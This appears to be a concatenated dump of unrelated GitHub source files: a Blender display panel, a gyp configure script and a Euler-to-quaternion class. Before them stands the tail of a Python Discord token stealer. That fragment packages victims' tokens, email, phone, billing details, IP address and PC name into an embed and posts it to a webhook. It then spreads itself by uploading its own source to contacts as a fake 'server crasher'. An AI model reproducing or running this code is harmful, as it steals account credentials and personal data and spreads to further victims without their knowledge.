"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Noodix: https://github.com/1714Noodix/TokenLog-PY",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("PASTE WEBHOOK HERE", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
[
"noreply@github.com"
] |
1714Noodix.noreply@github.com
|
cd5a919a4d41b784e14b9250ce816871de03c480
|
e32801b4debf07340b98255eb35e2c41ba2d2bb5
|
/scripts/addons_extern/toolplus_tileable_pattern_v2/tp_ui_view.py
|
c952bec5d0ae875b9e2936a91c9e487fc6622b9a
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
JuhaW/blenderpython
|
8c7130484690339c06f85b740c2f9e595b34a9dc
|
ee7b3a9f9d8cfbea32258e7ff05c3cb485a8879a
|
refs/heads/master
| 2021-07-21T23:59:42.476215
| 2017-10-25T08:42:04
| 2017-10-25T08:42:04
| 108,861,751
| 1
| 0
| null | 2017-10-30T14:25:14
| 2017-10-30T14:25:14
| null |
UTF-8
|
Python
| false
| false
| 5,390
|
py
|
import bpy
from bpy import*
from bpy.props import *
#from . icons.icons import load_icons
class View3D_TP_Tileable_Display_Panel(bpy.types.Panel):
""""""
bl_label = "Display"
bl_idname = "View3D_TP_Tileable_Display_Panel"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_category = "TP"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout.column_flow(1)
layout.operator_context = 'INVOKE_DEFAULT'
#icons = load_icons()
#CST = icons.get("CST")
#row.label("Animation Render", icon_value=CST.icon_id)
box = layout.box().column(1)
row = box.row(1)
row.alignment = 'CENTER'
row.label("OpenGL", icon='LAMP_SPOT')
box.separator()
row = box.row(1)
row.prop(context.space_data, "show_textured_solid","Enable Textured Solid", icon = "TEXTURE_SHADED")
row = box.row(1)
row.menu("VIEW3D_MT_opengl_lights_presets", text=bpy.types.VIEW3D_MT_opengl_lights_presets.bl_label, icon = "COLLAPSEMENU")
row.operator("scene.opengl_lights_preset_add", text="", icon='ZOOMIN')
row.operator("scene.opengl_lights_preset_add", text="", icon='ZOOMOUT').remove_active = True
box.separator()
system = bpy.context.user_preferences.system
def opengl_lamp_buttons(column, lamp):
split = column.split(percentage=0.1)
split.prop(lamp, "use", text="", icon='OUTLINER_OB_LAMP' if lamp.use else 'LAMP_DATA')
col = split.column()
col.active = lamp.use
row = col.row()
row.label(text="Diffuse:")
row.prop(lamp, "diffuse_color", text="")
row = col.row()
row.label(text="Specular:")
row.prop(lamp, "specular_color", text="")
col = split.column()
col.active = lamp.use
col.prop(lamp, "direction", text="")
row = box.row(1)
p = context.scene.opengl_lights_properties
row.prop(p, "edit", "Edit OpenGL Light", icon = "LIGHTPAINT")
if(p.edit):
box.separator()
box = layout.box().column(1)
column = box.column()
split = column.split(percentage=0.1)
split.label()
split.label(text="Colors:")
split.label(text="Direction:")
lamp = system.solid_lights[0]
opengl_lamp_buttons(column, lamp)
lamp = system.solid_lights[1]
opengl_lamp_buttons(column, lamp)
lamp = system.solid_lights[2]
opengl_lamp_buttons(column, lamp)
###
box.separator()
layout.operator_context = 'INVOKE_REGION_WIN'
layout.operator_context = 'INVOKE_AREA'
box = layout.box().column(1)
row = box.row(1)
row.alignment = 'CENTER'
row.label("3D View", icon='LAMP_DATA')
box.separator()
row = box.row(1)
row.prop(context.space_data, "use_matcap", icon ="MATCAP_06")
if context.space_data.use_matcap:
box.separator()
row = box.row(1)
row.scale_y = 0.2
row.scale_x = 0.5
row.template_icon_view(context.space_data, "matcap_icon")
box.separator()
row = box.row(1)
row.prop(context.space_data.fx_settings, "use_ssao", text="AOccl", icon="MATCAP_24")
if context.space_data.fx_settings.use_ssao:
box.separator()
row = box.row(1)
row.prop(context.space_data.fx_settings.ssao, "color","")
row.prop(context.space_data.fx_settings.ssao, "factor")
row = box.row(1)
row.prop(context.space_data.fx_settings.ssao, "distance_max")
row.prop(context.space_data.fx_settings.ssao, "attenuation")
row.prop(context.space_data.fx_settings.ssao, "samples")
###
box.separator()
box = layout.box().column(1)
row = box.row(1)
row.prop(context.space_data, "show_only_render", text="Render", icon ="RESTRICT_RENDER_ON")
row.prop(context.space_data, "show_floor", text="Grid", icon ="GRID")
row = box.row(1)
row.prop(context.space_data, "show_world", "World" ,icon ="WORLD")
sub = row.row(1)
sub.scale_x = 0.335
sub.prop(context.space_data, "show_axis_x", text="X", toggle=True)
sub.prop(context.space_data, "show_axis_y", text="Y", toggle=True)
sub.prop(context.space_data, "show_axis_z", text="Z", toggle=True)
if context.space_data.show_world:
box.separator()
row = box.row(1)
row.prop(context.scene.world, "horizon_color", "")
row = box.row(1)
row.prop(context.scene.world, "exposure")
row.prop(context.scene.world, "color_range")
###
box.separator()
|
[
"meta.androcto1@gmail.com"
] |
meta.androcto1@gmail.com
|
ce809f4f96fdfcf68456c7602b8491471934e49b
|
e12812df28879cc051c8ca6abe1c1aa07b8bf4dc
|
/configure
|
f0666ad495223a1b883cb2f9da2f67152c447444
|
[] |
no_license
|
lhecker/libnodecc
|
714438b63ab4ed090ce60b151da73b9e5c830129
|
655953fad2cc9c20aa9daa0b22af0504bea6ff89
|
refs/heads/master
| 2021-01-02T08:20:30.073453
| 2015-11-27T14:51:23
| 2015-11-27T14:51:23
| 20,214,879
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| true
| false
| 2,889
|
#!/usr/bin/env python
import glob
import platform
import os
import subprocess
import sys
CC = os.environ.get('CC', 'cc')
script_dir = os.path.dirname(__file__)
root_dir = os.path.normpath(script_dir)
output_dir = os.path.join(os.path.abspath(root_dir), 'out')
sys.path.insert(0, os.path.join(root_dir, 'build', 'gyp', 'pylib'))
try:
import gyp
except ImportError:
print('You need to install gyp in build/gyp first. See the README.')
sys.exit(42)
def host_arch():
machine = platform.machine()
if machine == 'i386': return 'ia32'
if machine == 'x86_64': return 'x64'
if machine.startswith('arm'): return 'arm'
if machine.startswith('mips'): return 'mips'
return machine # Return as-is and hope for the best.
def compiler_version():
proc = subprocess.Popen(CC.split() + ['--version'], stdout=subprocess.PIPE)
is_clang = 'clang' in proc.communicate()[0].split('\n')[0]
proc = subprocess.Popen(CC.split() + ['-dumpversion'], stdout=subprocess.PIPE)
version = proc.communicate()[0].split('.')
version = map(int, version[:2])
version = tuple(version)
return (version, is_clang)
def run_gyp(args):
rc = gyp.main(args)
if rc != 0:
print 'Error running GYP'
sys.exit(rc)
if __name__ == '__main__':
args = sys.argv[1:]
# GYP bug.
# On msvs it will crash if it gets an absolute path.
# On Mac/make it will crash if it doesn't get an absolute path.
if sys.platform == 'win32':
args.append(os.path.join(root_dir, 'nodecc.gyp'))
common_fn = os.path.join(root_dir, 'common.gypi')
# we force vs 2010 over 2008 which would otherwise be the default for gyp
if not os.environ.get('GYP_MSVS_VERSION'):
os.environ['GYP_MSVS_VERSION'] = '2013'
else:
args.append(os.path.join(os.path.abspath(root_dir), 'nodecc.gyp'))
common_fn = os.path.join(os.path.abspath(root_dir), 'common.gypi')
if os.path.exists(common_fn):
args.extend(['-I', common_fn])
args.append('--depth=' + root_dir)
args.append('--no-duplicate-basename-check')
# There's a bug with windows which doesn't allow this feature.
if sys.platform != 'win32':
if '-f' not in args:
args.extend('-f make'.split())
if 'eclipse' not in args and 'ninja' not in args:
args.extend(['-Goutput_dir=' + output_dir])
args.extend(['--generator-output', output_dir])
(major, minor), is_clang = compiler_version()
args.append('-Dgcc_version=%d' % (10 * major + minor))
args.append('-Dclang=%d' % int(is_clang))
if not any(a.startswith('-Dhost_arch=') for a in args):
args.append('-Dhost_arch=%s' % host_arch())
if not any(a.startswith('-Dtarget_arch=') for a in args):
args.append('-Dtarget_arch=%s' % host_arch())
if not any(a.startswith('-Dlibrary=') for a in args):
args.append('-Dlibrary=static_library')
if not any(a.startswith('-Dcomponent=') for a in args):
args.append('-Dcomponent=static_library')
gyp_args = list(args)
print gyp_args
run_gyp(gyp_args)
|
[
"leonard@hecker.io"
] |
leonard@hecker.io
|
|
ca871f398b9f65def86a29d93fa39109a0215972
|
f5e813c5e76271ac05e5aa48d0f5deeae111f5d8
|
/Euler.py
|
380cc7fef27bd77173ea404c1043c65f2eeb0e2d
|
[] |
no_license
|
BaxterKDL/ForwardKinematics
|
a2dc6c9e2cf6c57b98ccecad8f20662ffad2edc1
|
688eca6b0fcec3716dbaa6c27b21bc7b129d3558
|
refs/heads/master
| 2021-04-29T19:50:29.273038
| 2018-02-24T21:00:26
| 2018-02-24T21:00:26
| 121,585,193
| 0
| 2
| null | 2018-02-19T20:56:42
| 2018-02-15T02:45:33
| null |
UTF-8
|
Python
| false
| false
| 645
|
py
|
import numpy as np
from Quaternion import Quaternion
class Euler:
def __init__(self, val = (0, 0, 0)):
self.x = val[0]
self.y = val[1]
self.z = val[2]
def e2q(self):
quat = Quaternion((1, 0, 0, 0))
chz = np.cos(self.z / 2.0)
shz = np.sin(self.z / 2.0)
chy = np.cos(self.y / 2.0)
shy = np.sin(self.y / 2.0)
chx = np.cos(self.x / 2.0)
shx = np.sin(self.x / 2.0)
quat.w = chz*chy*chx + shz*shy*shx
quat.x = shz*chy*chx - chz*shy*shx
quat.y = chz*shy*chx + shz*chy*shx
quat.z = chz*chy*shx - shz*shy*chx
return quat
def value(self):
return [self.x, self.y, self.z]
def display(self):
print self.value()
|
[
"noreply@github.com"
] |
BaxterKDL.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.